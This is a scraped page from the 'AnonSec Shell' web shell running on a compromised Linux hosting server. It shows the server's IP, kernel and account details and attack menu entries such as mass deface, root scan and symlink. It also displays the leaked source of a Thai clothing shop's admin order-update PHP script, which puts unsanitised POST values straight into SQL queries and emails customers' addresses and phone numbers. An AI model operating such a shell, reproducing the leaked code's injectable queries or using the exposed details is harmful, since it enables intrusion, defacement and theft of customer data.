AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 172.71.28.146   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/cp648411/www/homhuan.com/mybackend/createorders/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cp648411/www/homhuan.com/mybackend/createorders/edit_save.php
<?php require_once("../include/class.php");?>
<?php include("table_name.php");?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php include("../include/mail.php");?>


<?php
$_SESSION['er'] = 'true';
$from = '[email protected]';
$date = date("Y-m-d H:i:s");




$list = array(	
			'table'=>$name_table,
			'Oid'=>$_POST["id"],
			'Pmid'=>$_POST["Pmid"],
			'Ostatus'=>$_POST["Ostatus"],
			'Obarcode'=>$_POST["Obarcode"],
			'shippingt_id'=>$_POST["spt_id"],
			'Olastdate'=>date("Y-m-d H:i:s")
		);
			  
		$add = $actiondata_db->edit_db($list);
	//print_r($add);	  

	
//print_r($add);
//exit;
	
	
if($_SESSION['er'] == 'true')
{
	
	
	if($_POST["Ostatus"] == 'Cancelled')
	{
		
		$list_ty = array('table'=>'c_order_detail','where'=>'Oid = "'.$_POST["id"].'"' ,'order'=> "ORDER BY ODid ASC");				  
		$view_ty = $view_db->view($list_ty);
		$result_ty = $view_db->q_re($view_ty);
		while($row = $view_db->q_ro($result_ty))
		{
			$sql_sp = array('table'=>'product_size','where'=>"id = '".$row['SPid']."'");
			$view_sp = $view_db->view($sql_sp);
			$row_sp = $view_db->q($view_sp);
			
			$stock_to = $row['ODqty'] + $row_sp['stock'];
			$list = array
			(
				'table'=>'product_size',
				'id'=>$row['SPid'],
				'stock'=>$stock_to
				
			);	  
			$add3 = $actiondata_db->edit_db($list);
		}
		
	}
	
	if($_POST["Obarcode"]<> '')
	{
		
	
		
			$to = $_POST['mail'];
			$sql = array('table'=>'c_orders','where'=>"Oid  = '". $_POST["id"] ."'");
			$view_sql = $view_db->view($sql);
			$row = $view_db->q($view_sql);
			$id_order = $_POST["id"];
		
			
			
	
			$sql3 = array('table'=>'shipping','where'=>"price = '". $row['Oshipprice']."'");
			$view_sql3 = $view_db->view($sql3);
			$row3 = $view_db->q($view_sql3);
			
			
			$sql2 = array('table'=>'ship_addr','where'=>"SAid = '".$row['SAid']."'");
			$view2 = $view_db->view($sql2);
			$row2 = $view_db->q($view2);	


			if($_POST['spt_id'] == 1)
			{
				$spt = 'ทาง www.homhuan.com ได้ทำการจัดส่งสินค้าให้ท่านทางไปรษณีย์ พัสดุไปรษณีย์ภายในประเทศ เรียบร้อยแล้ว
				ท่านสามารถตรวจสอบสถานการณ์จัดส่งได้ที่เบอร์ Call Center ของไปรษณีย์ 1545 หรือที่ทำการไปรษณีย์ปลายทาง
				เลขที่ติดตามพัสดุ (Tracking Number ) <font color="#FF0000"> '.$_POST["Obarcode"].' </font><br>';
			}
			if($_POST['spt_id'] == 2)
			{
				$spt = 'ทาง www.homhuan.com ได้ทำการจัดส่งสินค้าให้ท่านทางไปรษณีย์ พัสดุไปรษณีย์ลงทะเบียน เรียบร้อยแล้ว
ท่านสามารถตรวจสอบสถานการณ์จัดส่งได้ที่ <a href="http://track.thailandpost.co.th/">http://track.thailandpost.co.th/</a>
เลขที่ติดตามพัสดุ (Tracking Number ) <font color="#FF0000"> '.$_POST["Obarcode"].' </font><br>';
			}
			if($_POST['spt_id'] == 3)
			{
				$spt = 'ทาง www.homhuan.com ได้ทำการจัดส่งสินค้าให้ท่านทางไปรษณีย์ พัสดุไปรษณีย์ด่วนพิเศษ (EMS) เรียบร้อยแล้ว
ท่านสามารถตรวจสอบสถานการณ์จัดส่งได้ที่ <a href="http://track.thailandpost.co.th/">http://track.thailandpost.co.th/</a>
เลขที่ติดตามพัสดุ (Tracking Number ) <font color="#FF0000"> '.$_POST["Obarcode"].' </font><br>';
			}
			if($_POST['spt_id'] == 4)
			{
				$spt = 'ทาง www.homhuan.com ได้ทำการจัดส่งสินค้าให้ท่านทาง Kerry Express  เรียบร้อยแล้ว
ท่านสามารถตรวจสอบสถานการณ์จัดส่งได้ที่  <a href="http://th.ke.rnd.kerrylogistics.com/shipmenttracking">http://th.ke.rnd.kerrylogistics.com/shipmenttracking</a>
เลขที่ติดตามพัสดุ (Tracking Number ) <font color="#FF0000"> '.$_POST["Obarcode"].' </font><br>';
			}	

		  $msg = '<b>ยืนยันการส่งสินค้า </b><br>'.
			'
				<table width="100%" border="0" class="tb_receipt">
				  <tr>
					<td align="right"><img src="../../image/logo.png" width="188" class="img-responsive"></td>
				  </tr>
				  <tr>
					<td>เลขที่ใบสั่งซื้อ : #'.$id_order.'</td>
				  </tr>
				   <tr>
					<td>วันที่สั่งสินค้า : '.$util_class->day_num2($row["Odate"]).'</td>
				  </tr>
				  
				</table>
			'. '
			<div style="border:1px solid #FFF;margin-top:15px;">
			<table width="100%" border="0" class="tb_receipt">
			  <tr>
				<td>ที่อยู่สำหรับจัดส่งสินค้า</td>
			  </tr>
			   <tr>
				<td>'.$row2['SAfname'] .' '. $row2['SAlname'].'</td>
			  </tr>
			   <tr>
				<td>'.$row2['SAaddr'] .' '. $row2['SAstate'] .' '. $row2['SAzip'].'</td>
			  </tr>
			  <tr>
				<td>โทรศัพท์ : '.$Phone_class->phonenumber($row2['phone']).'</td>
			  </tr>
			</table>
			</div>
			<br><br>
			'.$spt.
			'
			<br><br><br>
			ขอขอบคุณที่ใช้บริการ <a href="http://www.homhuan.com">http://www.homhuan.com</a> <br><br><br>
		
		
			';
	
		
	
			$mail->SetFrom($from, $from);
			$mail->AddReplyTo($from, $from);
			
			$today = 'วันที่ &nbsp;' . date('d/m/Y').'<br>';
			$you = 'เรียนคุณ ' . $row2['SAfname'].' '.$row2['SAlname'].'<br><br><br>';
			
			
			$body = $sub.'<br><br>'.$today.$you.$msg.$contact;
			
			$mail->MsgHTML($body);
			$txt = 'หอมหวล ชุดปฏิบัติธรรม :: '.'ยืนยันการส่งสินค้า';
			$mail->Subject = $txt;
			$mail->AddAddress($row2['mail']); // ผู้รับ
			//$mail->addBCC('[email protected]'); // ผู้รับ
			$mail->addBCC('[email protected]'); // ผู้รับ
			$mail->addBCC('[email protected]'); // ผู้รับ
			//exit;
			//print_r('dd');
			if(!$mail->Send()) 
			{
				//echo "<meta http-equiv=\"refresh\" content=\"0; url=../main/index.php?menu=7&&msg=2\">";
				echo "<br> Mailer Error: " . $mail->ErrorInfo;
				unset($_SESSION['er']);
				exit();
			}
			else
			{
					$_SESSION['er'] = 'true-mail';
			}
		
	}
	
	
	$add = $User_db->log_Admin($_SESSION["admin_cn_id"],$_SESSION["admin_cn_user"],$name_table,'edit-'.$_POST['id']);
}
	
	if( $add['suc'] <> 1)
	{
		$_SESSION['er'] = 'false';
	}



?>
<meta http-equiv="refresh" content="0;URL=list.php">
<?php
exit;
?>

Anon7 - 2022
AnonSec Team